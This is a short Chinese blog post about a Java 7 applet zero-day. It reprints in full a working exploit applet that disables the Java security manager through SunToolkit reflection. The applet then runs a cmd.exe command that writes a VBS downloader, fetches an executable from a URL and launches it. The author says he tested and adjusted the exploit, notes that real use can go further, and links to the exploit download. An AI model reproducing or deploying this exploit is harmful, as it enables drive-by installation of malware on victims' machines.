这篇日志发布时间已经超过一年,许多内容可能已经失效,请读者酌情参考。
昨天看到Java的0Day。。。然后看到有EXP放出。。。然后下载测试。。。尼玛太可怕了。。
此次0Day只影响JDK1.7,对于1.6以下版本无影响。
坑爹啊,前几个月在写Swing,因为JDK1.7修了1.6的几个关于透明和不规则窗体的问题才更新到JDK1.7,现在就躺枪了....
EXP如下:
import java.applet.Applet;
import java.awt.Graphics;
import java.beans.Expression;
import java.beans.Statement;
import java.lang.reflect.Field;
import java.net.URL;
import java.security.*;
import java.security.cert.Certificate;
public class Gondvv extends Applet {
public Gondvv() {
}
public void disableSecurity() throws Throwable {
Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]);
Permissions localPermissions = new Permissions();
localPermissions.add(new AllPermission());
ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"),
new Certificate[0]), localPermissions);
AccessControlContext localAccessControlContext = new AccessControlContext(
new ProtectionDomain[] { localProtectionDomain });
SetField(Statement.class, "acc", localStatement, localAccessControlContext);
localStatement.execute();
}
private Class GetClass(String paramString) throws Throwable {
Object arrayOfObject[] = new Object[1];
arrayOfObject[0] = paramString;
Expression localExpression = new Expression(Class.class, "forName", arrayOfObject);
localExpression.execute();
return (Class) localExpression.getValue();
}
private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2)
throws Throwable {
Object arrayOfObject[] = new Object[2];
arrayOfObject[0] = paramClass;
arrayOfObject[1] = paramString;
Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject);
localExpression.execute();
((Field) localExpression.getValue()).set(paramObject1, paramObject2);
}
public void init() {
try {
disableSecurity();
Process localProcess = null;
String command = "cmd.exe /c echo Const adTypeBinary = 1 > d:\\apsou.vbs & echo Const adSaveCreateOverWrite = 2 >> d:\\apsou.vbs & echo Dim BinaryStream >> d:\\apsou.vbs & echo Set BinaryStream = CreateObject(\"ADODB.Stream\") >> d:\\apsou.vbs & echo BinaryStream.Type = adTypeBinary >> d:\\apsou.vbs & echo BinaryStream.Open >> d:\\apsou.vbs & echo BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) >> d:\\apsou.vbs & echo BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> d:\\apsou.vbs & echo Function BinaryGetURL(URL) >> d:\\apsou.vbs & echo Dim Http >> d:\\apsou.vbs & echo Set Http = CreateObject(\"WinHttp.WinHttpRequest.5.1\") >> d:\\apsou.vbs & echo Http.Open \"GET\", URL, False >> d:\\apsou.vbs & echo Http.Send >> d:\\apsou.vbs & echo BinaryGetURL = Http.ResponseBody >> d:\\apsou.vbs & echo End Function >> d:\\apsou.vbs & echo Set shell = CreateObject(\"WScript.Shell\") >> d:\\apsou.vbs & echo shell.Run \"d:\\update.exe\" >> d:\\apsou.vbs "
+ "& start d:\\apsou.vbs http://localhost/cmd.exe d:\\update.exe";
localProcess = Runtime.getRuntime().exec(command);
if (localProcess != null)
;
localProcess.waitFor();
} catch (Throwable localThrowable) {
localThrowable.printStackTrace();
}
}
public void paint(Graphics paramGraphics) {
paramGraphics.drawString("Loading", 50, 25);
}
}EXP中使用的是cmd生成了一个VBS脚本,然后用VBS脚本去下载木马文件并运行。方式不够隐蔽仅作演示使用,会被安全软件拦截(至少Comodo拦截了。。。),当然在实际使用的时候就可以随意了。。。你想都可以用cmd了,还有什么不可以。。。
昨晚看到的原文在这里:
最新Java 0day漏洞分析及EXP下载
EXP在这里:Java 0Day EXP
上边的EXP中vbs和java代码中的几个路径和使用方法不一致,我做了下简单的修改,实际使用还可以做更多的改动。。。。但是,记得点到为止。
留言交流